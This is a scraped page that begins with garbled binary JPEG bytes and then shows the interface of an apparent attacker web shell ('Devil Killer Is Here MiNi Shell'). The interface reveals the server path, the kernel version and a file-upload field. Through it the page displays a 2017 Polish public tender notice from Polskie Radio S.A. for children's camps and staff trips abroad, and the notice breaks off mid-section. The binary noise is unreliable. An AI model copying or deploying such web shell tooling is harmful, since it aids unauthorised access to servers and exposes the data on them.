JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170405/58984-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.prsa.pl' target='_blank'>http://www.prsa.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 58984 - 2017
              z dnia 2017-04-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Usługi w zakresie organizacji kolonii i obozu za granicą oraz wyjazdu turystyczno-wypoczynkowego za granicą na potrzeby Polskiego Radia S.A. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Polskie Radio S.A. Dział Zamówień Publicznych, krajowy numer identyfikacyjny
              1042059100000, ul.
              Al. Niepodległości 
              ,
              00977  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              +48 22 6459384, e-mail
              matylda.grzybowska@polskieradio.pl, faks
              +48 22 6453957.
              <br />
              Adres strony internetowej (URL): www.prsa.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.prsa.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.prsa.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w wersji papierowej , zgodnie z wytycznymi podanymi w pkt 19 SIWZ - opis sposobu przygotowania ofert<br />
                Adres:
                <br />Al. Niepodległości 77/85 00-977 Warszawa</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br />www.prsa.pl </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługi w zakresie organizacji kolonii i obozu za granicą oraz wyjazdu turystyczno-wypoczynkowego za granicą na potrzeby Polskiego Radia S.A. <br /><b>Numer referencyjny: </b>BZ-DZP.B5.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />nie<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia obejmuje swoim zakresem usługę zorganizowania kolonii i obozu do Bułgarii dla dzieci pracowników Polskiego Radia S.A. w przedziale wiekowym 10-19 lat jak również zorganizowanie dwóch wyjazdów turystyczno-wypoczynkowych do Szwajcarii dla pracowników, emerytów i rencistów Polskiego Radia S.A. oraz ich osób towarzyszących. Zamówienie zostało podzielone na dwa zadania. Zamawiający zgodnie z art. 34. ust 5. Ustawy Prawo Zamówień Publicznych zastrzega sobie możliwość skorzystania z prawa opcji. Zamawiający w szczegółowym Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) podał liczbę osób dla jakiej Wykonawca zobowiązany będzie bezwarunkowo zorganizować kolonię i obóz oraz wyjazdy turystyczno-wypoczynkowe w zakresie podstawowym przedmiotu zamówienia oraz liczbę osób, co do których pozostawia sobie możliwość skorzystania z prawa opcji (zakres opcjonalny przedmiotu zamówienia). 
Zamówienie z zakresu prawa opcji realizowane będzie na identycznych warunkach jak zamówienie z zakresu podstawowego. Cena jednostkowa za kolonię i obóz oraz wyjazd turystyczno-wypoczynkowy w ramach prawa opcji będzie identyczna jak cena kolonii i obozu oraz wyjazdu turystyczno-wypoczynkowego w ramach zakresu podstawowego zgodnie z ceną podaną w Formularzu Oferty Wykonawcy. O zamiarze skorzystania z prawa opcji, oraz podaniu konkretnie o ile osób więcej pojedzie na kolonię i obóz lub na wyjazd turystyczno-wypoczynkowy w każdej z grup, Zamawiający poinformuje odrębnie Wykonawcę w terminach przewidzianych we wzorach umów.

Podstawowy przedmiot zamówienia obejmuje swoim zakresem:
ZADANIE 1  zorganizowanie kolonii i obozu do Bułgarii dla dzieci w jednym terminie, dla 30 dzieci w dwóch przedziałach wiekowych: 10-14 lat i 15-19 lat. Zamawiający zastrzega, że dzieci wysyłane na kolonię i obóz w dniu wyjazdu mogą mieć nieukończone 10 lat.
Zamawiający zastrzega w zamówieniu opcjonalnym możliwość wysłania dodatkowo do 10 dzieci czyli zwiększenia zamówienia maksymalnie do 40 dzieci w terminie określonym w zamówieniu podstawowym i na takich samych warunkach i w cenie zaoferowanej w ofercie najkorzystniejszej zgodnie z warunkami wskazanymi w umowie.
ZADANIE 2  zorganizowanie dwóch wyjazdów turystyczno-wypoczynkowych (zwanych dalej również wycieczką lub imprezą turystyczną) do Szwajcarii łącznie dla 72 osób w dwóch terminach dla dwóch grup, w każdej grupie po 36 osób.
Zamawiający zastrzega w zamówieniu opcjonalnym możliwość wysłania dodatkowych do 48 osób, czyli dodatkowo maksymalnie do 24 osób w każdej grupie, czyli zwiększenia zamówienia łącznie maksymalnie do 120 osób (2 grupy po 60 osób każda) w terminach określonych w zamówieniu podstawowym i na takich samych warunkach i w cenie zaoferowanej w ofercie najkorzystniejszej zgodnie z warunkami wskazanymi w umowie.
Skorzystanie z prawa opcji, której zakres określony jest w Załączniku nr 1 do SIWZ może, a nie musi być przez Zamawiającego zrealizowane. Jak również nie stanowi podstawy 
do dochodzenia przez Wykonawców roszczeń odszkodowawczych z tytułu niezrealizowania prawa opcji. Szczegółowy opis przedmiotu zamówienia dla każdego z ZADAŃ znajduje się w Załączniku nr 1 do SIWZ. Szczegółowe warunki realizacji przedmiotu zamówienia zawierają wzory umów stanowiące załącznik nr 6 i 6a do SIWZ.<br /><br /><b>II.5) Główny kod CPV: </b>63511000-4<br /><b> Dodatkowe kody CPV:</b>63510000-7,
                63500000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/07/2017<br /></div><div style="padding-left: 20px">
                    data rozpoczęcia: 08/06/2017
                    data zakończenia: 23/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zadanie 1  Zamawiający wymaga, aby kolonia i obóz odbyły się w terminie pomiędzy 01 lipca 2017 r. a 06 sierpnia 2017 r.
Zadanie 2  Wyjazdy turystyczno-wypoczynkowe muszą odbyć się w niżej podanych terminach:
pierwszy termin wyjazdu pomiędzy 08.06.2017 r. a 20.06.2017 r. 
drugi termin wyjazdu pomiędzy 13.09.2017 r. a 23.09.2017 r.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Posiadają uprawnienia do wykonywania działalności zgodnie z wymogami ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U. z 2004 r. nr 223, poz. 2268 ze zm.), polegającej na wykonywaniu działalności gospodarczej w zakresie organizowania imprez turystycznych oraz pośredniczenia na zlecenie klientów w zawieraniu umów o świadczenie usług turystycznych  warunek udziału dla Zadania 1 i Zadania 2.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zgodnie z 9.1.2.1 SIWZ w przypadku składania oferty na Zadanie 1 wykażą, że dysponują 1 osobą spełniającą wymagania określone w art. 92p ust. 1 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz.U.2016.1943 ze zm.) uprawniające do bycia Kierownikiem wypoczynku (kolonii i obozu) oraz że dysponują dodatkowo 3 osobami spełniającymi wymagania określone w art. 92p ust. 1 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz.U.2016.1943 ze zm.) uprawniającymi do bycia wychowawcą wypoczynku, a każda z osób wskazana do realizacji zamówienia objętego przedmiotem Zadania 1 jako wychowawca wypoczynku wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, był(a) wychowawcą kolonii lub obozu na minimum 3 wypoczynkach (tzw. turnusach kolonijnych lub obozowych),
zgodnie z pkt 9.1.2.2 SIWZ w przypadku składania oferty na Zadanie 2 wykażą, że dysponują 1 osobą, która zostanie wyznaczona do realizacji przedmiotu Zadania 2 jako pilot wycieczki posiadającą doświadczenie w byciu pilotem co najmniej 2 (dwóch) wycieczek na terenie Szwajcarii, w okresie ostatnich 3 lat przed upływem terminu składania ofert.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Wykonawcy w celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonych w pkt 9.1.2.1 SIWZ dla Zadania 1 oraz 9.1.2.2 SIWZ dla Zadania 2 mogą polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących ich z nimi stosunków prawnych, pod warunkiem, że podmioty te zrealizują usługi do których opisem zdolności zadania są wymagane. W takim przypadku wykonawcy zobowiązani są udowodnić Zamawiającemu, że realizując niniejsze zamówienie będą dysponować niezbędnymi zasobami tych podmiotów w stopniu umożliwiającym realizację zamówienia oraz że będą mieli do tych zasobów faktyczny i rzeczywisty dostęp. Zamawiający, z zastrzeżeniem pkt 9.2 SIWZ, oceni czy udostępnione wykonawcy zasoby, pozwalają na wykazanie przez wykonawcę spełnienie warunku udziału w postępowaniu określonego w pkt 9.1.2.1 lub pkt 9.1.2.2 SIWZ oraz zbada czy wobec tych podmiotów nie zachodzą podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13)  22) i art. 24 ust. 5 pkt 1)  4) ustawy. Jeżeli zdolności techniczne lub zawodowe podmiotu, na którego zdolnościach polega Wykonawca, nie potwierdzą spełnienia przez wykonawcę warunku udziału, o którym mowa w pkt. 9.1.2.1 lub 9.1.2.2 SIWZ, lub jeżeli w wyniku badania okaże się, że wobec tego podmiotu zachodzą podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami lub zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe określone w pkt 9.1.2.1 lub 9.1.2.2 SIWZ.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstawy do wykluczenia na podstawie art. 24 ust. 1 pkt 23) ustawy, wykonawcy zgodnie z art. 24 ust. 11 ustawy, po otwarciu ofert, w terminie 3 dni od dnia zamieszczenia na stronie internetowej podanej w pkt 1 SIWZ, informacji, o której mowa w art. 86 ust. 5 ustawy, zobowiązani są przedłożyć oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23) ustawy, wg wzoru stanowiącego Załącznik nr 3 do SIWZ. Wykonawcy wraz ze złożeniem przedmiotowego oświadczenia, mogą przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłóceń konkurencyjności w niniejszym postępowaniu o udzielenie zamówienia.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta w postępowaniu została najwyżej oceniona do złożenia w terminie 5 dni aktualnych na dzień złożenia ofert następujących dokumentów: 
10.3.1 SIWZ wykazu osób w celu potwierdzenia, że osoby wskazane do realizacji zamówienia spełniają wymagania określone w punkcie 9.1.2.1 według wzoru stanowiącego Załącznik nr 7 do SIWZ, dla Zadania 1,
10.3.2 SIWZ wykazu osób w celu potwierdzenia, że osoby wskazane do realizacji zamówienia spełniają wymagania określone w punkcie 9.1.2.2 według wzoru stanowiącego Załącznik nr 7a do SIWZ, dla Zadania 2,
10.3.3 SIWZ w przypadku gdy wykonawca polega na zasobach innych podmiotów w celu oceny, czy wykonawca będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie niniejszego zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów dokumentów, które określają w szczególności:
1)zakres dostępnych wykonawcy zasobów innego podmiotu;
2)sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;
3)zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
4)czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału określonych w pkt 9.1.2 SIWZ usługi, których wskazane zdolności dotyczą.
10.3.4	Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 9.1.2, 9.1.4, 9.1.5 i 9.1.6 SIWZ. 
Zgodnie z art. 26 ust. 2f ustawy jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów z zastrzeżeniem art. 26 ust. 6 ustawy.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Zgodnie z pkt 13.1.4 SIWZ Wytyczne do przedstawionego przez wykonawcę programu organizowanej kolonii i obozu dla Zadania 1 oraz programu wyjazdu turystyczno-wypoczynkowego dla Zadania 2, o których mowa w Załączniku nr 5 do SIWZ.

Po zakończeniu postępowania, a przed zawarciem umowy wykonawca, którego oferta zostanie uznana za najkorzystniejszą, dla każdego zadania oddzielnie, zobowiązany będzie do przedłożenia Zamawiającemu oryginału lub poświadczonej za zgodność z oryginałem kopii polisy ubezpieczeniowej lub innego dokumentu ubezpieczenia będącego potwierdzeniem, że Wykonawca ma zawartą umowę ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzenia działalności gospodarczej i posiadania mienia (deliktowo-kontraktowej) z sumą gwarancyjną nie mniejszą niż 500.000,00 PLN (słownie: pięćset tysięcy złotych) na jedno i wszystkie zdarzenia w okresie ubezpieczenia. Wykonawca zobowiązuje się do zachowania kontynuacji ochrony ubezpieczeniowej po realizacji umowy przez okres co najmniej 30 dni (okres inkubacji/ujawnienia szkody). Wykonawca zobowiązany jest do rozszerzenia ochrony na:
a.podwykonawców, na jedno i wszystkie zdarzenia w okresie ubezpieczenia  w przypadku realizowania przedmiotu umowy przez Wykonawcę przy udziale podwykonawcy (podwykonawców),
b.szkody związane z korzystaniem przez uczestników z produktów lub usług gastronomicznych, w tym wynikające z zatruć pokarmowych.
Dowód ubezpieczenia będzie stanowił Załącznik nr 3 do umowy, 
W przypadku, gdy wykonywanie zamówienia odbędzie się z udziałem podwykonawców  wykonawca poda Zamawiającemu dane kontaktowe podwykonawców i wskaże osoby wyznaczone do kontaktu z nim. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za najkorzystniejszą, przedłożą oprócz polisy ubezpieczeniowej  umowę regulującą współpracę tych wykonawców. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zgodnie z pkt 17.1 SIWZ Oferta powinna być zabezpieczona wadium o łącznej wartości będącej sumą niżej podanych kwot określonych dla poszczególnych zadań, na które wykonawca zamierza złożyć ofertę:
